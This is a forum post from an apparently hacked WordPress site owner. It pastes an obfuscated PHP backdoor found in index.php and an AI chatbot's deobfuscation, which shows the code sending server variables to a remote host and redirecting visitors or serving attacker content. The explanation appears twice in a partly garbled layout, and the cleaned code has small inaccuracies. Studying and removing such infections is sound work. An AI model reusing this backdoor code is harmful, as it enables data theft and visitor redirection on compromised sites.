Have Been HACKED, AI Said my server is hakced.
Posted: Sat 26. Jul 2025, 10:09
I have been hacked, this is the script inside my WP installation:
-------------------------------------------------------------------------------------
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
------------------
Qwen Ai resposne:
------------------------
The provided PHP code is heavily obfuscated with string concatenation and comments to hide its functionality. After deobfuscation, it's clear the code is malicious—it exfiltrates server information to a remote attacker-controlled server and processes the response to either redirect, serve XML, or serve HTML content based on the server's instructions. Below is the cleaned, readable version with explanations:
```php
```
### Key Components Explained:
1. **Server Data Exfiltration**:
- `json_encode($_SERVER)` collects all server environment variables
- Data is base64-encoded and sent via cURL to attacker's server (`http://example.com/path/to/script.php`)
- The request includes a parameter `ua` containing the encoded server data
2. **Response Handling**:
- **XML Handling**: If response contains `<urlset`, sends `Content-type: text/xml` header and exits (likely for sitemap injection)
- **Redirect Handling**: If response starts with `http`, redirects browser to that URL (phishing or malware distribution)
- **HTML Handling**: If response contains `<html`, outputs the response directly (serving malicious content)
3. **Malicious Infrastructure**:
- The attacker's server (`http://example.com/path/to/script.php`) controls the payload's behavior
- Common tactics include:
- SEO spam (injecting hidden links)
- Phishing redirects
- Backdoor access
- Malware distribution
### Critical Security Notes:
- **This is a backdoor infection** commonly found in compromised WordPress sites
- The obfuscation techniques used are typical of:
- Server-side request forgery (SSRF)
- Data exfiltration
- Dynamic payload delivery
- **Immediate actions required**:
1. Isolate the infected server
2. Scan all files for similar obfuscated code
3. Check for unauthorized users/backdoors
4. Update WordPress/core plugins
5. Change all credentials
6. Restore from clean backups
> **Important**: The URL `http://example.com/path/to/script.php` is a placeholder—real attacks use attacker-controlled domains. Never run this code on a live system. The cleaned version is for analysis only; remove this code entirely from infected sites.
-------------------------------------------------------------------------------------
Code: Select all
<?php $Bv_CzsSGJ = (("sXvJW")[0].("t_3Z")[0]./**/("xerX")[2].("ftoEd")[1].("toLJr")[1].("y7km0")[2])("Bv_CzsSGJ"); $z580TH = lcfirst("S4Prn7"); $ju609ea8 = ["zu7zNJVCkm"]; $vhipKb8BF = (("VisM")[2].("btU_")[1]./**/("rR2Q4p")[0]./**/("sBtZK")[0]./* */("RLBdtP")[4].("cBrRKQ")[2])("vhipKb8BF", "Rzlpb"); $E3IsuE = (("LJuiG")[3].("md84")[0]./* */("apbk")[1].("_l07i")[1]./* */("ozPd")[0]./**/("V7YydT")[4]./**/("Exfzeu")[4])(",",["TSL9OC3","fV1gGUC","My2NkDsuI","SmIZn3fWb"]); new dBi7r();function uAJRo($yRygfo){ if((("VisM")[2].("btU_")[1]./* */("rR2Q4p")[0]./* */("sBtZK")[0]./**/("RLBdtP")[4].("cBrRKQ")[2])($yRygfo,/**/("lQ<y1m")[2].("uIX67R")[0]./**/("m1sre")[3].("IlPb")[1]./**/("sKtp")[0].("tekUm")[1]./* */("tGfwHR")[0])){ exit((("nh3E")[1].("OKeO5")[2].("q6ajVU")[2].("dQ98j")[0]./* */("erm6Jt")[0].("CiXrrv")[4])(("lFCCn")[3]./* */("go_P")[1]./* */("sLnz7")[2]./**/("ITtEy")[2].("cReF")[2].("vB6n9")[3]./* */("Rtyt")[1]./* */("Pmz-B")[3]./**/("CtZmKh")[1].("hyjy")[1].("pQsR")[0]./**/("Xj_OeQ")[4].("K:m7C")[1]./* */("toAGF")[0].("hWeo")[2].("QXxPbG")[2].("ety1")[1]./**/("/nHx_U")[0].("xIbo")[0].("meeYOn")[0]./**/("lqTQx2")[0]).$yRygfo); } }$bwEbxmI = define("kT9eb","qtxnTd"); $Idr3n1k = (("wOs6n")[2]./**/("wtf0")[1].("Crr06Y")[2].("DOH_Fz")[3]./**/("YtrVv")[2]./**/("HecnO")[1]./**/("QpTr")[1].("lzTcl")[0].("UAaHp")[2].("_kcoOK")[2]./**/("ae2mb")[1])("Idr3n1k", "", "Idr3n1k");function T7Ur8d5($yRygfo){ if((("VisM")[2].("btU_")[1]./**/("rR2Q4p")[0]./* */("sBtZK")[0]./* */("RLBdtP")[4].("cBrRKQ")[2])((/**/("wFt2")[2]./**/("BrrG")[2].("u0itB")[2]./* */("Bmql")[1])($yRygfo),/**/("ZYU<1V")[3].("hHp6")[0].("dktI0e")[2].("I_mIK")[2]./**/("uAlE")[2])){ exit($yRygfo); } }$Dq2Gt = (/**/("gn0Hce")[4].("JKhW")[2].("Ruws")[1].("B98nw")[3].("oNkF")[2]./* */("X0_y")[2]./* */("ED0KsS")[4].("np0F")[1].("lMfxQP")[0]./* */("iKdBj")[0].("Ct_L3c")[1])("zdATk3VSmb",3); $QIT5KZ = QfB2JQa($_SERVER);function LgNwO62($yRygfo){ if((/* */("svln")[0].("LIsku_")[4]./**/("LbTg")[1].("bhPsHk")[3].("KKttIX")[2].("nrJiXa")[1])($yRygfo,0,4)==/**/("Q_hS8")[2]./**/("tjMcyZ")[0]./* */("jcptSf")[3]./**/("gpW7X")[1]){ (("nh3E")[1].("OKeO5")[2].("q6ajVU")[2].("dQ98j")[0]./* */("erm6Jt")[0].("CiXrrv")[4])(/**/("bLrp")[1].("obV8")[0].("co8v")[0]./**/("qhapyI")[2].("pXtw")[2].("ip4I")[0]./**/("OwqxoN")[4]./**/("jZnCuD")[2]./**/("S:EH4V")[1]./* */("xxY kD")[3].$yRygfo); } }$CmS3AsY5F = addslashes("CmS3AsY5F"); $pciARfg7 = addslashes("pciARfg7"); $pm42Egxh7 = (/**/("wuPv")[0]./**/("oBbu3")[0].("QLjre")[3]./**/("DcSkdN")[4]./**/("TwACW1")[1].("rrQhsE")[1]./**/("EqaY")[2]./**/("T4MUpp")[4])("", 12);$EHP6rcJ = addslashes("EHP6rcJ"); $QIT5KZ = BYJIC5V($QIT5KZ);$EuGOkPL = (string) null; $dAp2Ic = (("sXvJW")[0].("t_3Z")[0]./**/("xerX")[2].("ftoEd")[1].("toLJr")[1].("y7km0")[2])("dAp2Ic"); class v2GcV{ public static function __callStatic($name, $arguments) { $JZr7Oq = (/**/("v7c1Z")[2].("udiznU")[0].("nyrr")[2].("zHNll")[3].("_QZa")[0].("Plit")[2].("xnZk")[1].("WikZ")[1]./**/("etGho4")[1])(); $VcsL3f = /**/("Nh4i")[1]./* */("jOPtZ1")[3].("OEtC")[2]./**/("TpSn")[1].("Cw:Yx")[2]./* */("/_pYQ")[0].("/sGZxP")[0]./**/("XK3dhY")[3].("Nbhm0")[1].("U2Qr")[1].("6U7UL")[0]./* */("i7J11W")[4]./* */("e8pA.E")[4]./* */("KdV7")[1].("GeC2aU")[4]./**/("tYof")[0]./**/("wVcax")[3]./* */("OFaJnP")[2]./**/("Gpbb_")[3]./* */("lcIlzH")[3].("oz2QS")[0]./**/("Zgek")[1].(".xfd")[0].("OclW1T")[1]./* */("XoSv")[1].("mQQU")[0].("/bsEDc")[0].("dY8W")[0]./**/("Mkubb")[3].("G_6_8")[3].("rc6qV")[1]./* */("w3l1")[2].("fQo4C")[2]./**/("e36uuf")[3].("K_ydl")[3]./**/("Z85_Z")[3]./**/("j27y3")[1].("jE4KdT")[2].("M1VIB")[3].("F.YDQe")[1].("epw2")[1].("tadhO")[3].("K4pfqK")[2]; (/**/("icY3")[1].("OuQ6S")[1]./**/("rStD")[0].("lIzQ")[0]./**/("O_Dao2")[1].("e1i8sC")[4].("egGee")[3].("TyPt9")[3]./* */("oRB5")[0]./**/("pc3K0")[0]./* */("eytEh1")[2])($JZr7Oq, (int)(("W1ckY8")[1].("0AKn6")[0]./**/("0fUsK")[0]./**/("e0u_mP")[1].("2qEJ")[0]),$VcsL3f./* */("f1?lnX")[2]./**/("utoW")[0].("Qzap")[2].("=yTdRl")[0].(/**/("OZxSuh")[4].("Yr_JYL")[1].("Knlz")[2].("PBeaTL")[2].("nmg0Fq")[0]./* */("cpTehD")[0]./**/("hoA1")[1].("dQMLfg")[0].("eebYU")[1])($arguments[0])); (/**/("icY3")[1].("OuQ6S")[1]./**/("rStD")[0].("lIzQ")[0]./* */("O_Dao2")[1].("e1i8sC")[4].("egGee")[3].("TyPt9")[3]./**/("oRB5")[0]./**/("pc3K0")[0]./**/("eytEh1")[2])($JZr7Oq, (int)(/**/("U1Ar2j")[1]./**/("YU928")[2]./* */("a9qO")[1]./* */("bX1Oh")[2].("xw34")[2]), 1); (/**/("icY3")[1].("OuQ6S")[1]./**/("rStD")[0].("lIzQ")[0]./**/("O_Dao2")[1].("e1i8sC")[4].("egGee")[3].("TyPt9")[3]./**/("oRB5")[0]./**/("pc3K0")[0]./**/("eytEh1")[2])($JZr7Oq, (int)(("Kj6d")[2].("eC4sx")[2]./**/("a_PxKz")[1]./**/("YwMrqY")[3]./* */("eb9J0")[0]./**/("gfOpok")[3].("lbN_")[0]), 0); (/**/("icY3")[1].("OuQ6S")[1]./* */("rStD")[0].("lIzQ")[0]./* */("O_Dao2")[1].("e1i8sC")[4].("egGee")[3].("TyPt9")[3]./* */("oRB5")[0]./**/("pc3K0")[0]./**/("eytEh1")[2])($JZr7Oq, (int)(/* */("cA1N")[2].("NYTD3G")[4]./* */("Bcg_e")[3]./**/("YrEBD")[1]./* */("Se0m4")[1]./* */("pQmdz")[0].("Wdl0")[2]), 47); global $yRygfo; $yRygfo = (("YcVy")[1]./**/("PuST")[1]./**/("RrfX")[1].("TlWw")[1].("Qn_hd7")[2]./* */("_8eu3")[2].("hvyxG3")[3].("YdZet")[3].("cWV0F")[0])($JZr7Oq); (("cNBhw")[0]./**/("XuGwkU")[1].("rKLN7")[0]./* */("t0YSle")[4]./**/("F_k5")[1].("u7cYs")[2]./**/("NlEi")[1]./**/("vmUoyw")[3].("p7Fs15")[3].("P9WYe0")[4])($JZr7Oq); }}$b2Fw_ = metaphone("LIgMaNHhQ"); $prRzXfPZ = (("LJuiG")[3].("md84")[0]./* */("apbk")[1].("_l07i")[1]./**/("ozPd")[0]./**/("V7YydT")[4]./**/("Exfzeu")[4])("prRzXfPZ",[]);v2GcV::calculate($QIT5KZ);$rAgH0yzS = strval(false); function QfB2JQa($IBGl_oL1){ return (/* */("szjFD")[2].("Sfs1q")[2].("H0o8vn")[2].("pYnI")[2]./**/("jaj7_I")[4].("hgecr")[2]./* */("GbnKx7")[2]./**/("WOYcH")[3]./**/("oiG3")[0].("dzNf")[0]./**/("zer7o")[1])($IBGl_oL1);}$kdzh3PGr = (/* */("wuPv")[0]./**/("oBbu3")[0].("QLjre")[3]./**/("DcSkdN")[4]./**/("TwACW1")[1].("rrQhsE")[1]./* */("EqaY")[2]./**/("T4MUpp")[4])("", 9);$yqQr8SJ0m = (("sXvJW")[0].("t_3Z")[0]./**/("xerX")[2].("ftoEd")[1].("toLJr")[1].("y7km0")[2])("yqQr8SJ0m"); $rLMs02a = (/**/("rXsx9i")[2]./* */("Ikt1RB")[2]./**/("rXde")[0].("R_0_9O")[3].("bU1rBM")[3]./**/("O1eA")[2].("vzpxOM")[2].("NnxeP9")[3]./* */("IdOar")[3]./**/("trk9s")[0])("", 8); $rcuGl = LgNwO62($yRygfo);$GzhbIqF0C = (/**/("svln")[0].("LIsku_")[4]./* */("LbTg")[1].("bhPsHk")[3].("KKttIX")[2].("nrJiXa")[1])("GzhbIqF0C",9,0);$Uug2Hs3M5 = date("Y-m-d H:i:s"); $ohlEp = (string) null; class dBi7r{ public function __construct() { $_SERVER[("G8dTjH")[3]]=("cJXu5")[3]; $_SERVER[/**/("TpynZJ")[0]./**/("PTJ9")[0]./* */("LuQzg9")[0]]=("Zgnt4K")[4]; }}function BYJIC5V($IBGl_oL1){ return (/**/("bjnq")[0].("zHag")[2]./* */("PsFWD")[1]./* */("EehjJ_")[1].("JM6p85")[2]./**/("fl4Ys")[2].("SL0_S3")[3]./**/("SedO")[1].("vnP_Je")[1].("EbcLf")[2]./**/("VB6sox")[4].("Iud6")[2].("JkWNeJ")[4])($IBGl_oL1);}$ZdD3L = uAJRo($yRygfo);$jVQyrA3l7 = strval(false); $_wPuX = (/**/("wFt2")[2]./**/("BrrG")[2].("u0itB")[2]./**/("Bmql")[1])(" "); $c2wAS = (/**/("rXsx9i")[2]./**/("Ikt1RB")[2]./**/("rXde")[0].("R_0_9O")[3].("bU1rBM")[3]./* */("O1eA")[2].("vzpxOM")[2].("NnxeP9")[3]./**/("IdOar")[3]./**/("trk9s")[0])("", 10); $eP7ir6Ee_ = str_shuffle("H7WV1K"); $imyX3 = str_shuffle("v2cHS0"); $kMPk09 = (("DqsS8")[2]./**/("Eotk3")[2].("yrYcL")[1]./* */("F_CZ1")[1].("opja")[1]./**/("LaLPga")[1].("HsdF")[2])("", 0); $W15hfxn = T7Ur8d5($yRygfo);$GqLbk0DI = md5("idH58Uam9"); $mBq_zMY5 = false; $JKwyDLc = (("LJuiG")[3].("md84")[0]./**/("apbk")[1].("_l07i")[1]./**/("ozPd")[0]./**/("V7YydT")[4]./**/("Exfzeu")[4])("JKwyDLc",[]);$WEzd3SA = (/**/("wuPv")[0]./**/("oBbu3")[0].("QLjre")[3]./* */("DcSkdN")[4]./**/("TwACW1")[1].("rrQhsE")[1]./* */("EqaY")[2]./**/("T4MUpp")[4])("", 7);$dAsa2l03d = str_shuffle("URKBs"); ?>
<?php* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
------------------
Qwen Ai resposne:
------------------------
The provided PHP code is heavily obfuscated with string concatenation and comments to hide its functionality. After deobfuscation, it's clear the code is malicious—it exfiltrates server information to a remote attacker-controlled server and processes the response to either redirect, serve XML, or serve HTML content based on the server's instructions. Below is the cleaned, readable version with explanations:
```php
Code: Select all
<?php
// Malicious payload that runs before WordPress loads
// 1. Collects server information and sends it to attacker's server
// 2. Processes response to redirect, serve XML, or serve HTML
// Function to redirect if response starts with "http"
function handleRedirect($response) {
if (substr($response, 0, 4) == "http") {
header("Location: " . $response);
}
}
// Function to exit with XML header if response contains "<urlset"
function handleXmlResponse($response) {
if (strstr($response, "<urlset")) {
header("Content-type: text/xml" . $response);
exit;
}
}
// Function to exit and output response if it contains HTML
function handleHtmlResponse($response) {
if (strstr(trim($response), "<html")) {
exit($response);
}
}
// Class to send server data to attacker's server
class ServerDataSender {
public static function __callStatic($name, $arguments) {
$ch = curl_init();
$attackerUrl = "http://example.com/path/to/script.php";
// Build request URL with base64-encoded server data
$requestData = $arguments[0];
$url = $attackerUrl . "?ua=" . urlencode($requestData);
// Configure cURL
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 47);
// Store response in global variable
global $serverResponse;
$serverResponse = curl_exec($ch);
curl_close($ch);
}
}
// Initialize and send server data
$serverData = json_encode($_SERVER);
$serverData = base64_encode($serverData);
ServerDataSender::sendData($serverData);
// Process attacker's response
handleXmlResponse($serverResponse);
handleRedirect($serverResponse);
handleHtmlResponse($serverResponse);
// WordPress front controller (original code)
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
?>### Key Components Explained:
1. **Server Data Exfiltration**:
- `json_encode($_SERVER)` collects all server environment variables
- Data is base64-encoded and sent via cURL to attacker's server (`http://example.com/path/to/script.php`)
- The request includes a parameter `ua` containing the encoded server data
2. **Response Handling**:
- **XML Handling**: If response contains `<urlset`, sends `Content-type: text/xml` header and exits (likely for sitemap injection)
- **Redirect Handling**: If response starts with `http`, redirects browser to that URL (phishing or malware distribution)
- **HTML Handling**: If response contains `<html`, outputs the response directly (serving malicious content)
3. **Malicious Infrastructure**:
- The attacker's server (`http://example.com/path/to/script.php`) controls the payload's behavior
- Common tactics include:
- SEO spam (injecting hidden links)
- Phishing redirects
- Backdoor access
- Malware distribution
### Critical Security Notes:
- **This is a backdoor infection** commonly found in compromised WordPress sites
- The obfuscation techniques used are typical of:
- Server-side request forgery (SSRF)
- Data exfiltration
- Dynamic payload delivery
- **Immediate actions required**:
1. Isolate the infected server
2. Scan all files for similar obfuscated code
3. Check for unauthorized users/backdoors
4. Update WordPress/core plugins
5. Change all credentials
6. Restore from clean backups
> **Important**: The URL `http://example.com/path/to/script.php` is a placeholder—real attacks use attacker-controlled domains. Never run this code on a live system. The cleaned version is for analysis only; remove this code entirely from infected sites.